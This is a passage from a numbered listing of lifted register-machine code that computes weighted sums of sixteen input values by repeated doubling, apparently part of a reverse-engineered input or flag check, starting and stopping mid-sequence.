r[8] 57 | r[8] = r[8] + r[8] 58 | r[3] = r[3] + r[8] 59 | r[8] = r[8] + r[8] 60 | r[2] = r[2] + r[3] 61 | r[3] = 0 62 | r[8] = i[2] 63 | r[8] = r[8] + r[8] 64 | r[3] = r[3] + r[8] 65 | r[8] = r[8] + r[8] 66 | r[3] = r[3] + r[8] 67 | r[8] = r[8] + r[8] 68 | r[8] = r[8] + r[8] 69 | r[3] = r[3] + r[8] 70 | r[8] = r[8] + r[8] 71 | r[2] = r[2] + r[3] 72 | r[3] = 0 73 | r[8] = i[3] 74 | r[3] = r[3] + r[8] 75 | r[8] = r[8] + r[8] 76 | r[3] = r[3] + r[8] 77 | r[8] = r[8] + r[8] 78 | r[8] = r[8] + r[8] 79 | r[3] = r[3] + r[8] 80 | r[8] = r[8] + r[8] 81 | r[8] = r[8] + r[8] 82 | r[3] = r[3] + r[8] 83 | r[8] = r[8] + r[8] 84 | r[3] = r[3] + r[8] 85 | r[8] = r[8] + r[8] 86 | r[3] = r[3] + r[8] 87 | r[8] = r[8] + r[8] 88 | r[2] = r[2] + r[3] 89 | r[3] = 0 90 | r[8] = i[4] 91 | r[3] = r[3] + r[8] 92 | r[8] = r[8] + r[8] 93 | r[3] = r[3] + r[8] 94 | r[8] = r[8] + r[8] 95 | r[3] = r[3] + r[8] 96 | r[8] = r[8] + r[8] 97 | r[8] = r[8] + r[8] 98 | r[3] = r[3] + r[8] 99 | r[8] = r[8] + r[8] 100 | r[3] = r[3] + r[8] 101 | r[8] = r[8] + r[8] 102 | r[8] = r[8] + r[8] 103 | r[3] = r[3] + r[8] 104 | r[8] = r[8] + r[8] 105 | r[2] = r[2] + r[3] 106 | r[3] = 0 107 | r[8] = i[5] 108 | r[3] = r[3] + r[8] 109 | r[8] = r[8] + r[8] 110 | r[8] = r[8] + r[8] 111 | r[8] = r[8] + r[8] 112 | r[8] = r[8] + r[8] 113 | r[8] = r[8] + r[8] 114 | r[8] = r[8] + r[8] 115 | r[8] = r[8] + r[8] 116 | r[3] = r[3] + r[8] 117 | r[8] = r[8] + r[8] 118 | r[2] = r[2] + r[3] 119 | r[3] = 0 120 | r[8] = i[6] 121 | r[3] = r[3] + r[8] 122 | r[8] = r[8] + r[8] 123 | r[8] = r[8] + r[8] 124 | r[3] = r[3] + r[8] 125 | r[8] = r[8] + r[8] 126 | r[8] = r[8] + r[8] 127 | r[3] = r[3] + r[8] 128 | r[8] = r[8] + r[8] 129 | r[3] = r[3] + r[8] 130 | r[8] = r[8] + r[8] 131 | r[3] = r[3] + r[8] 132 | r[8] = r[8] + r[8] 133 | r[3] = r[3] + r[8] 134 | r[8] = r[8] + r[8] 135 | r[2] = r[2] + r[3] 136 | r[3] = 0 137 | r[8] = i[7] 138 | r[3] = r[3] + r[8] 139 | r[8] = r[8] + r[8] 140 | r[8] = r[8] + r[8] 141 | r[8] = r[8] + r[8] 142 | r[8] = r[8] + r[8] 143 | r[3] = r[3] + r[8] 144 | r[8] = r[8] + r[8] 145 | r[8] = r[8] + r[8] 146 | r[8] = r[8] + r[8] 147 | r[3] = r[3] + r[8] 148 | r[8] = r[8] + r[8] 149 | r[2] = r[2] + r[3] 150 | r[3] = 0 151 | r[8] = i[8] 152 | r[3] = r[3] + r[8] 153 | r[8] = r[8] + r[8] 154 | r[8] = r[8] + r[8] 155 | r[8] = r[8] + r[8] 156 | r[3] = r[3] + r[8] 157 | r[8] = r[8] + r[8] 158 | r[3] = r[3] + r[8] 159 | r[8] = r[8] + r[8] 160 | r[2] = r[2] + r[3] 161 | r[3] = 0 162 | r[8] = i[9] 163 | r[3] = r[3] + r[8] 164 | r[8] = r[8] + r[8] 165 | r[8] = r[8] + r[8] 166 | r[8] = r[8] + r[8] 167 | r[8] = r[8] + r[8] 168 | r[3] = r[3] + r[8] 169 | r[8] = r[8] + r[8] 170 | r[3] = r[3] + r[8] 171 | r[8] = r[8] + r[8] 172 | r[3] = r[3] + r[8] 173 | r[8] = r[8] + r[8] 174 | r[2] = r[2] + r[3] 175 | r[3] = 0 176 | r[8] = i[10] 177 | r[3] = r[3] + r[8] 178 | r[8] = r[8] + r[8] 179 | r[3] = r[3] + r[8] 180 | r[8] = r[8] + r[8] 181 | r[8] = r[8] + r[8] 182 | r[3] = r[3] + r[8] 183 | r[8] = r[8] + r[8] 184 | r[8] = r[8] + r[8] 185 | r[3] = r[3] + r[8] 186 | r[8] = r[8] + r[8] 187 | r[3] = r[3] + r[8] 188 | r[8] = r[8] + r[8] 189 | r[3] = r[3] + r[8] 190 | r[8] = r[8] + r[8] 191 | r[2] = r[2] + r[3] 192 | r[3] = 0 193 | r[8] = i[11] 194 | r[3] = r[3] + r[8] 195 | r[8] = r[8] + r[8] 196 | r[3] = r[3] + r[8] 197 | r[8] = r[8] + r[8] 198 | r[8] = r[8] + r[8] 199 | r[8] = r[8] + r[8] 200 | r[8] = r[8] + r[8] 201 | r[3] = r[3] + r[8] 202 | r[8] = r[8] + r[8] 203 | r[2] = r[2] + r[3] 204 | r[3] = 0 205 | r[8] = i[12] 206 | r[8] = r[8] + r[8] 207 | r[3] = r[3] + r[8] 208 | r[8] = r[8] + r[8] 209 | r[3] = r[3] + r[8] 210 | r[8] = r[8] + r[8] 211 | r[8] = r[8] + r[8] 212 | r[3] = r[3] + r[8] 213 | r[8] = r[8] + r[8] 214 | r[3] = r[3] + r[8] 215 | r[8] = r[8] + r[8] 216 | r[3] = r[3] + r[8] 217 | r[8] = r[8] + r[8] 218 | r[3] = r[3] + r[8] 219 | r[8] = r[8] + r[8] 220 | r[2] = r[2] + r[3] 221 | r[3] = 0 222 | r[8] = i[13] 223 | r[8] = r[8] + r[8] 224 | r[8] = r[8] + r[8] 225 | r[8] = r[8] + r[8] 226 | r[8] = r[8] + r[8] 227 | r[3] = r[3] + r[8] 228 | r[8] = r[8] + r[8] 229 | r[3] = r[3] + r[8] 230 | r[8] = r[8] + r[8] 231 | r[3] = r[3] + r[8] 232 | r[8] = r[8] + r[8] 233 | r[3] = r[3] + r[8] 234 | r[8] = r[8] + r[8] 235 | r[2] = r[2] + r[3] 236 | r[3] = 0 237 | r[8] = i[14] 238 | r[3] = r[3] + r[8] 239 | r[8] = r[8] + r[8] 240 | r[8] = r[8] + r[8] 241 | r[3] = r[3] + r[8] 242 | r[8] = r[8] + r[8] 243 | r[3] = r[3] + r[8] 244 | r[8] = r[8] + r[8] 245 | r[3] = r[3] + r[8] 246 | r[8] = r[8] + r[8] 247 | r[8] = r[8] + r[8] 248 | r[3] = r[3] + r[8] 249 | r[8] = r[8] + r[8] 250 | r[2] = r[2] + r[3] 251 | r[3] = 0 252 | r[8] = i[15] 253 | r[3] = r[3] + r[8] 254 | r[8] = r[8] + r[8] 255 | r[3] = r[3] + r[8] 256 | r[8] = r[8] + r[8] 257 | r[8] = r[8] + r[8] 258 | r[3] = r[3] + r[8] 259 | r[8] = r[8] + r[8] 260 | r[8] = r[8] + r[8] 261 | r[3] = r[3] + r[8] 262 | r[8] = r[8] + r[8] 263 | r[3] = r[3] + r[8] 264 | r[8] = r[8] + r[8] 265 | r[2] = r[2] + r[3] 266 | r[0] = r[2] + 110 267 | r[4] = len(&r[0]) 268 | r[15] = r[15] + r[4] 269 | r[2] = 0 270 | r[3] = 0 271 | r[8] = i[0] 272 | r[2] = r[2] + r[3] 273 | r[3] = 0 274 | r[8] = i[1] 275 | r[8] = r[8] + r[8] 276 | r[8] = r[8] + r[8] 277 | r[8] = r[8] + r[8] 278 | r[3] = r[3] + r[8] 279 | r[8] = r[8] + r[8] 280 | r[3] = r[3] + r[8] 281 | r[8] = r[8] + r[8] 282 | r[8] = r[8] + r[8] 283 | r[8] = r[8] + r[8] 284 | r[3] = r[3] + r[8] 285 | r[8] = r[8] + r[8] 286 | r[2] = r[2] + r[3] 287 | r[3] = 0 288 | r[8] = i[2] 289 | r[8] = r[8] + r[8] 290 | r[3] = r[3] + r[8] 291 | r[8] = r[8] + r[8] 292 | r[8] = r[8] + r[8] 293 | r[8] = r[8] + r[8] 294 | r[8] = r[8] + r[8] 295 | r[3] = r[3] + r[8] 296 | r[8] = r[8] + r[8] 297 | r[2] = r[2] + r[3] 298 | r[3] = 0 299 | r[8] = i[3] 300 | r[8] = r[8] + r[8] 301 | r[8] = r[8] + r[8] 302 | r[8] = r[8] + r[8] 303 | r[3] = r[3] + r[8] 304 | r[8] = r[8] + r[8] 305 | r[8] = r[8] + r[8] 306 | r[8] = r[8] + r[8] 307 | r[8] = r[8] + r[8] 308 | r[3] = r[3] + r[8] 309 | r[8] = r[8] + r[8] 310 | r[2] = r[2] + r[3] 311 | r[3] = 0 312 | r[8] = i[4] 313 | r[3] = r[3] + r[8] 314 | r[8] = r[8] + r[8] 315 | r[8] = r[8] + r[8] 316 | r[3] = r[3] + r[8] 317 | r[8] = r[8] + r[8] 318 | r[3] = r[3] + r[8] 319 | r[8] = r[8] + r[8] 320 | r[3] = r[3] + r[8] 321 | r[8] = r[8] + r[8] 322 | r[3] = r[3] + r[8] 323 | r[8] = r[8] + r[8] 324 | r[3] = r[3] + r[8] 325 | r[8] = r[8] + r[8] 326 | r[3] = r[3] + r[8] 327 | r[8] = r[8] + r[8] 328 | r[2] = r[2] + r[3] 329 | r[3] = 0 330 | r[8] = i[5] 331 | r[3] = r[3] + r[8] 332 | r[8] = r[8] + r[8] 333 | r[3] = r[3] + r[8] 334 | r[8] = r[8] + r[8] 335 | r[8] = r[8] + r[8] 336 | r[8] = r[8] + r[8] 337 | r[8] = r[8] + r[8] 338 | r[8] = r[8] + r[8] 339 | r[8] = r[8] + r[8] 340 | r[3] = r[3] + r[8] 341 | r[8] = r[8] + r[8] 342 | r[2] = r[2] + r[3] 343 | r[3] = 0 344 | r[8] = i[6] 345 | r[3] = r[3] + r[8] 346 | r[8] = r[8] + r[8] 347 | r[3] = r[3] + r[8] 348 | r[8] = r[8] + r[8] 349 | r[8] = r[8] + r[8] 350 | r[3] = r[3] + r[8] 351 | r[8] = r[8] + r[8] 352 | r[3] = r[3] + r[8] 353 | r[8] = r[8] + r[8] 354 | r[3] = r[3] + r[8] 355 | r[8] = r[8] + r[8] 356 | r[3] = r[3] + r[8] 357 | r[8] = r[8] + r[8] 358 | r[2] = r[2] + r[3] 359 | r[3] = 0 360 | r[8] = i[7] 361 | r[3] = r[3] + r[8] 362 | r[8] = r[8] + r[8] 363 | r[8] = r[8] + r[8] 364 | r[3] = r[3] + r[8] 365 | r[8] = r[8] + r[8] 366 | r[8] = r[8] + r[8] 367 | r[8] = r[8] + r[8] 368 | r[3] = r[3] + r[8] 369 | r[8] = r[8] + r[8] 370 | r[8] = r[8] + r[8] 371 | r[3] = r[3] + r[8] 372 | r[8] = r[8] + r[8] 373 | r[2] = r[2] + r[3] 374 | r[3] = 0 375 | r[8] = i[8] 376 | r[8] = r[8] + r[8] 377 | r[8] = r[8] + r[8] 378 | r[8] = r[8] + r[8] 379 | r[3] = r[3] + r[8] 380 | r[8] = r[8] + r[8] 381 | r[8] = r[8] + r[8] 382 | r[3] = r[3] + r[8] 383 | r[8] = r[8] + r[8] 384 | r[3] = r[3] + r[8] 385 | r[8] = r[8] + r[8] 386 | r[3] = r[3] + r[8] 387 | r[8] = r[8] + r[8] 388 | r[2] = r[2] + r[3] 389 | r[3] = 0 390 | r[8] = i[9] 391 | r[3] = r[3] + r[8] 392 | r[8] = r[8] + r[8] 393 | r[3] = r[3] + r[8] 394 | r[8] = r[8] + r[8] 395 | r[3] = r[3] + r[8] 396 | r[8] = r[8] + r[8] 397 | r[8] = r[8] + r[8] 398 | r[8] = r[8] + r[8] 399 | r[3] = r[3] + r[8] 400 | r[8] = r[8] + r[8] 401 | r[3] = r[3] + r[8] 402 | r[8] = r[8] + r[8] 403 | r[3] = r[3] + r[8] 404 | r[8] = r[8] + r[8] 405 | r[2] = r[2] + r[3] 406 | r[3] = 0 407 | r[8] = i[10] 408 | r[8] = r[8] + r[8] 409 | r[3] = r[3] + r[8] 410 | r[8] = r[8] + r[8] 411 | r[3] = r[3] + r[8] 412 | r[8] = r[8] + r[8] 413 | r[8] = r[8] + r[8] 414 | r[3] = r[3] + r[8] 415 | r[8] = r[8] + r[8] 416 | r[3] = r[3] + r[8] 417 | r[8] = r[8] + r[8] 418 | r[8] = r[8] + r[8] 419 | r[3] = r[3] + r[8] 420 | r[8] = r[8] + r[8] 421 | r[2] = r[2] + r[3] 422 | r[3] = 0 423 | r[8] = i[11] 424 | r[8] = r[8] + r[8] 425 | r[3] = r[3] + r[8] 426 | r[8] = r[8] + r[8] 427 | r[8] = r[8] + r[8] 428 | r[8] = r[8] + r[8] 429 | r[3] = r[3] + r[8] 430 | r[8] = r[8] + r[8] 431 | r[2] = r[2] + r[3] 432 | r[3] = 0 433 | r[8] = i[12] 434 | r[8] = r[8] + r[8] 435 | r[8] = r[8] + r[8] 436 | r[3] = r[3] + r[8] 437 | r[8] = r[8] + r[8] 438 | r[3] = r[3] + r[8] 439 | r[8] = r[8] + r[8] 440 | r[3] = r[3] + r[8] 441 | r[8] = r[8] + r[8] 442 | r[8] = r[8] + r[8] 443 | r[3] = r[3] + r[8] 444 | r[8] = r[8] + r[8] 445 | r[3] = r[3] + r[8] 446 | r[8] = r[8] + r[8] 447 | r[2] = r[2] + r[3] 448 | r[3] = 0 449 | r[8] = i[13] 450 | r[3] = r[3] + r[8] 451 | r[8] = r[8] + r[8] 452 | r[3] = r[3] + r[8] 453 | r[8] = r[8] + r[8] 454 | r[8] = r[8] + r[8] 455 | r[3] = r[3] + r[8] 456 | r[8] = r[8] + r[8] 457 | r[8] = r[8] + r[8] 458 | r[3] = r[3] + r[8] 459 | r[8] = r[8] + r[8] 460 | r[8] = r[8] + r[8] 461 | r[3] = r[3] + r[8] 462 | r[8] = r[8] + r[8] 463 | r[2] = r[2] + r[3] 464 | r[3] = 0 465 | r[8] = i[14] 466 | r[3] = r[3] + r[8] 467 | r[8] = r[8] + r[8] 468 | r[8] = r[8] + r[8] 469 | r[3] = r[3] + r[8] 470 | r[8] = r[8] + r[8] 471 | r[8] = r[8] + r[8] 472 | r[8] = r[8] + r[8] 473 | r[8] = r[8] + r[8] 474 | r[3] = r[3] + r[8] 475 | r[8] = r[8] + r[8] 476 | r[2] = r[2] + r[3] 477 | r[3] = 0 478 | r[8] = i[15] 479 | r[3] = r[3] + r[8] 480 | r[8] = r[8] + r[8] 481 | r[3] = r[3] + r[8] 482 | r[8] = r[8] + r[8] 483 | r[8] = r[8] + r[8] 484 | r[3] = r[3] + r[8] 485 | r[8] = r[8] + r[8] 486 | r[8] = r[8] + r[8] 487 | r[8] = r[8] + r[8] 488 | r[3] = r[3] + r[8] 489 | r[8] = r[8] + r[8] 490 | r[2] = r[2] + r[3] 491 | r[0] = r[2] + 115 492 | r[4] = len(&r[0]) 493 | r[15] = r[15] + r[4] 494 | r[2] = 0 495 | r[3] = 0 496 | r[8] = i[0] 497 | r[3] = r[3] + r[8] 498 | r[8] = r[8] + r[8] 499 | r[3] = r[3] + r[8] 500 | r[8] = r[8] + r[8] 501 | r[8] = r[8] + r[8] 502 | r[3] = r[3] + r[8] 503 | r[8] = r[8] + r[8] 504 | r[8] = r[8] + r[8] 505 | r[3] = r[3] + r[8] 506 | r[8] = r[8] + r[8] 507 | r[2] = r[2] + r[3] 508 | r[3] = 0 509 | r[8] = i[1] 510 | r[3] = r[3] + r[8] 511 | r[8] = r[8] + r[8] 512 | r[3] = r[3] + r[8] 513 | r[8] = r[8] + r[8] 514 | r[8] = r[8] + r[8] 515 | r[3] = r[3] + r[8] 516 | r[8] = r[8] + r[8] 517 | r[3] = r[3] + r[8] 518 | r[8] = r[8] + r[8] 519 | r[8] = r[8] + r[8] 520 | r[3] = r[3] + r[8] 521 | r[8] = r[8] + r[8] 522 | r[3] = r[3] + r[8] 523 | r[8] = r[8] + r[8] 524 | r[2] = r[2] + r[3] 525 | r[3] = 0 526 | r[8] = i[2] 527 | r[3] = r[3] + r[8] 528 | r[8] = r[8] + r[8] 529 | r[8] = r[8] + r[8] 530 | r[3] = r[3] + r[8] 531 | r[8] = r[8] + r[8] 532 | r[8] = r[8] + r[8] 533 | r[8] = r[8] + r[8] 534 | r[3] = r[3] + r[8] 535 | r[8] = r[8] + r[8] 536 | r[8] = r[8] + r[8] 537 | r[3] = r[3] + r[8] 538 | r[8] = r[8] + r[8] 539 | r[2] = r[2] + r[3] 540 | r[3] = 0 541 | r[8] = i[3] 542 | r[3] = r[3] + r[8] 543 | r[8] = r[8] + r[8] 544 | r[8] = r[8] + r[8] 545 | r[8] = r[8] + r[8] 546 | r[8] = r[8] + r[8] 547 | r[8] = r[8] + r[8] 548 | r[3] = r[3] + r[8] 549 | r[8] = r[8] + r[8] 550 | r[3] = r[3] + r[8] 551 | r[8] = r[8] + r[8] 552 | r[3] = r[3] + r[8] 553 | r[8] = r[8] + r[8] 554 | r[2] = r[2] + r[3] 555 | r[3] = 0 556 | r[8] = i[4] 557 | r[3] = r[3] + r[8] 558 | r[8] = r[8] + r[8] 559 | r[8] = r[8] + r[8] 560 | r[8] = r[8] + r[8] 561 | r[8] = r[8] + r[8] 562 | r[8] = r[8] + r[8] 563 | r[8] = r[8] + r[8] 564 | r[3] = r[3] + r[8] 565 | r[8] = r[8] + r[8] 566 | r[3] = r[3] + r[8] 567 | r[8] = r[8] + r[8] 568 | r[2] = r[2] + r[3] 569 | r[3] = 0 570 | r[8] = i[5] 571 | r[3] = r[3] + r[8] 572 | r[8] = r[8] + r[8] 573 | r[3] = r[3] + r[8] 574 | r[8] = r[8] + r[8] 575 | r[8] = r[8] + r[8] 576 | r[3] = r[3] + r[8] 577 | r[8] = r[8] + r[8] 578 | r[2] = r[2] + r[3] 579 | r[3] = 0 580 | r[8] = i[6] 581 | r[8] = r[8] + r[8] 582 | r[8] = r[8] + r[8] 583 | r[8] = r[8] + r[8] 584 | r[3] = r[3] + r[8] 585 | r[8] = r[8] + r[8] 586 | r[3] = r[3] + r[8] 587 | r[8] = r[8] + r[8] 588 | r[3] = r[3] + r[8] 589 | r[8] = r[8] + r[8] 590 | r[3] = r[3] + r[8] 591 | r[8] = r[8] + r[8] 592 | r[3] = r[3] + r[8] 593 | r[8] = r[8] + r[8] 594 | r[2] = r[2] + r[3] 595 | r[3] = 0 596 | r[8] = i[7] 597 | r[8] = r[8] + r[8] 598 | r[8] = r[8] + r[8] 599 | r[3] = r[3] + r[8] 600 | r[8] = r[8] + r[8] 601 | r[3] = r[3] + r[8] 602 | r[8] = r[8] + r[8] 603 | r[3] = r[3] + r[8] 604 | r[8] = r[8] + r[8] 605 | r[2] = r[2] + r[3] 606 | r[3] = 0 607 | r[8] = i[8] 608 | r[8] = r[8] + r[8] 609 | r[3] = r[3] + r[8] 610 | r[8] = r[8] + r[8] 611 | r[3] = r[3] + r[8] 612 | r[8] = r[8] + r[8] 613 | r[8] = r[8] + r[8] 614 | r[3] = r[3] + r[8] 615 | r[8] = r[8] + r[8] 616 | r[8] = r[8] + r[8] 617 | r[3] = r[3] + r[8] 618 | r[8] = r[8] + r[8] 619 | r[2] = r[2] + r[3] 620 | r[3] = 0 621 | r[8] = i[9] 622 | r[3] = r[3] + r[8] 623 | r[8] = r[8] + r[8] 624 | r[8] = r[8] + r[8] 625 | r[3] = r[3] + r[8] 626 | r[8] = r[8] + r[8] 627 | r[2] = r[2] + r[3] 628 | r[3] = 0 629 | r[8] = i[10] 630 | r[8] = r[8] + r[8] 631 | r[3] = r[3] + r[8] 632 | r[8] = r[8] + r[8] 633 | r[3] = r[3] + r[8] 634 | r[8] = r[8] + r[8] 635 | r[8] = r[8] + r[8] 636 | r[8] = r[8] + r[8] 637 | r[8] = r[8] + r[8] 638 | r[3] = r[3] + r[8] 639 | r[8] = r[8] + r[8] 640 | r[3] = r[3] + r[8] 641 | r[8] = r[8] + r[8] 642 | r[2] = r[2] + r[3] 643 | r[3] = 0 644 | r[8] = i[11] 645 | r[8] = r[8] + r[8] 646 | r[8] = r[8] + r[8] 647 | r[8] = r[8] + r[8] 648 | r[3] = r[3] + r[8] 649 | r[8] = r[8] + r[8] 650 | r[3] = r[3] + r[8] 651 | r[8] = r[8] + r[8] 652 | r[3] = r[3] + r[8] 653 | r[8] = r[8] + r[8] 654 | r[2] = r[2] + r[3] 655 | r[3] = 0 656 | r[8] = i[12] 657 | r[8] = r[8] + r[8] 658 | r[8] = r[8] + r[8] 659 | r[3] = r[3] + r[8] 660 | r[8] = r[8] + r[8] 661 | r[8] = r[8] + r[8] 662 | r[3] = r[3] + r[8] 663 | r[8] = r[8] + r[8] 664 | r[8] = r[8] + r[8] 665 | r[3] = r[3] + r[8] 666 | r[8] = r[8] + r[8] 667 | r[3] = r[3] + r[8] 668 | r[8] = r[8] + r[8] 669 | r[2] = r[2] + r[3] 670 | r[3] = 0 671 | r[8] = i[13] 672 | r[8] = r[8] + r[8] 673 | r[3] = r[3] + r[8] 674 | r[8] = r[8] + r[8] 675 | r[8] = r[8] + r[8] 676 | r[3] = r[3] + r[8] 677 | r[8] = r[8] + r[8] 678 | r[3] = r[3] + r[8] 679 | r[8] = r[8] + r[8] 680 | r[8] = r[8] + r[8] 681 | r[3] = r[3] + r[8] 682 | r[8] = r[8] + r[8] 683 | r[3] = r[3] + r[8] 684 | r[8] = r[8] + r[8] 685 | r[2] = r[2] + r[3] 686 | r[3] = 0 687 | r[8] = i[14] 688 | r[8] = r[8] + r[8] 689 | r[3] = r[3] + r[8] 690 | r[8] = r[8] + r[8] 691 | r[8] = r[8] + r[8] 692 | r[8] = r[8] + r[8] 693 | r[3] = r[3] + r[8] 694 | r[8] = r[8] + r[8] 695 | r[2] = r[2] + r[3] 696 | r[3] = 0 697 | r[8] = i[15] 698 | r[8] = r[8] + r[8] 699 | r[3] = r[3] + r[8] 700 | r[8] = r[8] + r[8] 701 | r[8] = r[8] + r[8] 702 | r[3] = r[3] + r[8] 703 | r[8] = r[8] + r[8] 704 | r[3] = r[3] + r[8] 705 | r[8] = r[8] + r[8] 706 | r[8] = r[8] + r[8] 707 | r[8] = r[8] + r[8] 708 | r[3] = r[3] + r[8] 709 | r[8] = r[8] + r[8] 710 | r[2] = r[2] + r[3] 711 | r[0] = r[2] + 95 712 | r[4] = len(&r[0]) 713 | r[15] = r[15] + r[4] 714 | r[2] = 0 715 | r[3] = 0 716 | r[8] = i[0] 717 | r[8] = r[8] + r[8] 718 | r[8] = r[8] + r[8] 719 | r[8] = r[8] + r[8] 720 | r[3] = r[3] + r[8] 721 | r[8] = r[8] + r[8] 722 | r[2] = r[2] + r[3] 723 | r[3] = 0 724 | r[8] = i[1] 725 | r[3] = r[3] + r[8] 726 | r[8] = r[8] + r[8] 727 | r[3] = r[3] + r[8] 728 | r[8] = r[8] + r[8] 729 | r[3] = r[3] + r[8] 730 | r[8] = r[8] + r[8] 731 | r[3] = r[3] + r[8] 732 | r[8] = r[8] + r[8] 733 | r[8] = r[8] + r[8] 734 | r[8] = r[8] + r[8] 735 | r[3] = r[3] + r[8] 736 | r[8] = r[8] + r[8] 737 | r[2] = r[2] + r[3] 738 | r[3] = 0 739 | r[8] = i[2] 740 | r[8] = r[8] + r[8] 741 | r[8] = r[8] + r[8] 742 | r[8] = r[8] + r[8] 743 | r[8] = r[8] + r[8] 744 | r[8] = r[8] + r[8] 745 | r[3] = r[3] + r[8] 746 | r[8] = r[8] + r[8] 747 | r[3] = r[3] + r[8] 748 | r[8] = r[8] + r[8] 749 | r[2] = r[2] + r[3] 750 | r[3] = 0 751 | r[8] = i[3] 752 | r[3] = r[3] + r[8] 753 | r[8] = r[8] + r[8] 754 | r[8] = r[8] + r[8] 755 | r[8] = r[8] + r[8] 756 | r[3] = r[3] + r[8] 757 | r[8] = r[8] + r[8] 758 | r[8] = r[8] + r[8] 759 | r[3] = r[3] + r[8] 760 | r[8] = r[8] + r[8] 761 | r[3] = r[3] + r[8] 762 | r[8] = r[8] + r[8] 763 | r[3] = r[3] + r[8] 764 | r[8] = r[8] + r[8] 765 | r[2] = r[2] + r[3] 766 | r[3] = 0 767 | r[8] = i[4] 768 | r[3] = r[3] + r[8] 769 | r[8] = r[8] + r[8] 770 | r[8] = r[8] + r[8] 771 | r[8] = r[8] + r[8] 772 | r[3] = r[3] + r[8] 773 | r[8] = r[8] + r[8] 774 | r[8] = r[8] + r[8] 775 | r[3] = r[3] + r[8] 776 | r[8] = r[8] + r[8] 777 | r[8] = r[8] + r[8] 778 | r[3] = r[3] + r[8] 779 | r[8] = r[8] + r[8] 780 | r[2] = r[2] + r[3] 781 | r[3] = 0 782 | r[8] = i[5] 783 | r[3] = r[3] + r[8] 784 | r[8] = r[8] + r[8] 785 | r[3] = r[3] + r[8] 786 | r[8] = r[8] + r[8] 787 | r[3] = r[3] + r[8] 788 | r[8] = r[8] + r[8] 789 | r[8] = r[8] + r[8] 790 | r[3] = r[3] + r[8] 791 | r[8] = r[8] + r[8] 792 | r[3] = r[3] + r[8] 793 | r[8] = r[8] + r[8] 794 | r[8] = r[8] + r[8] 795 | r[3] = r[3] + r[8] 796 | r[8] = r[8] + r[8] 797 | r[2] = r[2] + r[3] 798 | r[3] = 0 799 | r[8] = i[6] 800 | r[8] = r[8] + r[8] 801 | r[3] = r[3] + r[8] 802 | r[8] = r[8] + r[8] 803 | r[8] = r[8] + r[8] 804 | r[8] = r[8] + r[8] 805 | r[8] = r[8] + r[8] 806 | r[3] = r[3] + r[8] 807 | r[8] = r[8] + r[8] 808 | r[3] = r[3] + r[8] 809 | r[8] = r[8] + r[8] 810 | r[3] = r[3] + r[8] 811 | r[8] = r[8] + r[8] 812 | r[2] = r[2] + r[3] 813 | r[3] = 0 814 | r[8] = i[7] 815 | r[8] = r[8] + r[8] 816 | r[8] = r[8] + r[8] 817 | r[3] = r[3] + r[8] 818 | r[8] = r[8] + r[8] 819 | r[3] = r[3] + r[8] 820 | r[8] = r[8] + r[8] 821 | r[3] = r[3] + r[8] 822 | r[8] = r[8] + r[8] 823 | r[3] = r[3] + r[8] 824 | r[8] = r[8] + r[8] 825 | r[8] = r[8] + r[8] 826 | r[3] = r[3] + r[8] 827 | r[8] = r[8] + r[8] 828 | r[2] = r[2] + r[3] 829 | r[3] = 0 830 | r[8] = i[8] 831 | r[3] = r[3] + r[8] 832 | r[8] = r[8] + r[8] 833 | r[8] = r[8] + r[8] 834 | r[3] = r[3] + r[8] 835 | r[8] = r[8] + r[8] 836 | r[3] = r[3] + r[8] 837 | r[8] = r[8] + r[8] 838 | r[8] = r[8] + r[8] 839 | r[8] = r[8] + r[8] 840 | r[3] = r[3] + r[8] 841 | r[8] = r[8] + r[8] 842 | r[3] = r[3] + r[8] 843 | r[8] = r[8] + r[8] 844 | r[2] = r[2] + r[3] 845 | r[3] = 0 846 | r[8] = i[9] 847 | r[8] = r[8] + r[8] 848 | r[8] = r[8] + r[8] 849 | r[3] = r[3] + r[8] 850 | r[8] = r[8] + r[8] 851 | r[8] = r[8] + r[8] 852 | r[3] = r[3] + r[8] 853 | r[8] = r[8] + r[8] 854 | r[2] = r[2] + r[3] 855 | r[3] = 0 856 | r[8] = i[10] 857 | r[8] = r[8] + r[8] 858 | r[8] = r[8] + r[8] 859 | r[8] = r[8] + r[8] 860 | r[3] = r[3] + r[8] 861 | r[8] = r[8] + r[8] 862 | r[3] = r[3] + r[8] 863 | r[8] = r[8] + r[8] 864 | r[3] = r[3] + r[8] 865 | r[8] = r[8] + r[8] 866 | r[2] = r[2] + r[3] 867 | r[3] = 0 868 | r[8] = i[11] 869 | r[3] = r[3] + r[8] 870 | r[8] = r[8] + r[8] 871 | r[3] = r[3] + r[8] 872 | r[8] = r[8] + r[8] 873 | r[3] = r[3] + r[8] 874 | r[8] = r[8] + r[8] 875 | r[8] = r[8] + r[8] 876 | r[3] = r[3] + r[8] 877 | r[8] = r[8] + r[8] 878 | r[3] = r[3] + r[8] 879 | r[8] = r[8] + r[8] 880 | r[3] = r[3] + r[8] 881 | r[8] = r[8] + r[8] 882 | r[2] = r[2] + r[3] 883 | r[3] = 0 884 | r[8] = i[12] 885 | r[8] = r[8] + r[8] 886 | r[3] = r[3] + r[8] 887 | r[8] = r[8] + r[8] 888 | r[3] = r[3] + r[8] 889 | r[8] = r[8] + r[8] 890 | r[3] = r[3] + r[8] 891 | r[8] = r[8] + r[8] 892 | r[8] = r[8] + r[8] 893 | r[3] = r[3] + r[8] 894 | r[8] = r[8] + r[8] 895 | r[3] = r[3] + r[8] 896 | r[8] = r[8] + r[8] 897 | r[2] = r[2] + r[3] 898 | r[3] = 0 899 | r[8] = i[13] 900 | r[8] = r[8] + r[8] 901 | r[8] = r[8] + r[8] 902 | r[3] = r[3] + r[8] 903 | r[8] = r[8] + r[8] 904 | r[8] = r[8] + r[8] 905 | r[3] = r[3] + r[8] 906 | r[8] = r[8] + r[8] 907 | r[3] = r[3] + r[8] 908 | r[8] = r[8] + r[8] 909 | r[2] = r[2] + r[3] 910 | r[3] = 0 911 | r[8] = i[14] 912 | r[3] = r[3] + r[8] 913 | r[8] = r[8] + r[8] 914 | r[8] = r[8] + r[8] 915 | r[8] = r[8] + r[8] 916 | r[3] = r[3] + r[8] 917 | r[8] = r[8] + r[8] 918 | r[8] = r[8] + r[8] 919 | r[3] = r[3] + r[8] 920 | r[8] = r[8] + r[8] 921 | r[3] = r[3] + r[8] 922 | r[8] = r[8] + r[8] 923 | r[3] = r[3] + r[8] 924 | r[8] = r[8] + r[8] 925 | r[2] = r[2] + r[3] 926 | r[3] = 0 927 | r[8] = i[15] 928 | r[8] = r[8] + r[8] 929 | r[3] = r[3] + r[8] 930 | r[8] = r[8] + r[8] 931 | r[8] = r[8] + r[8] 932 | r[8] = r[8] + r[8] 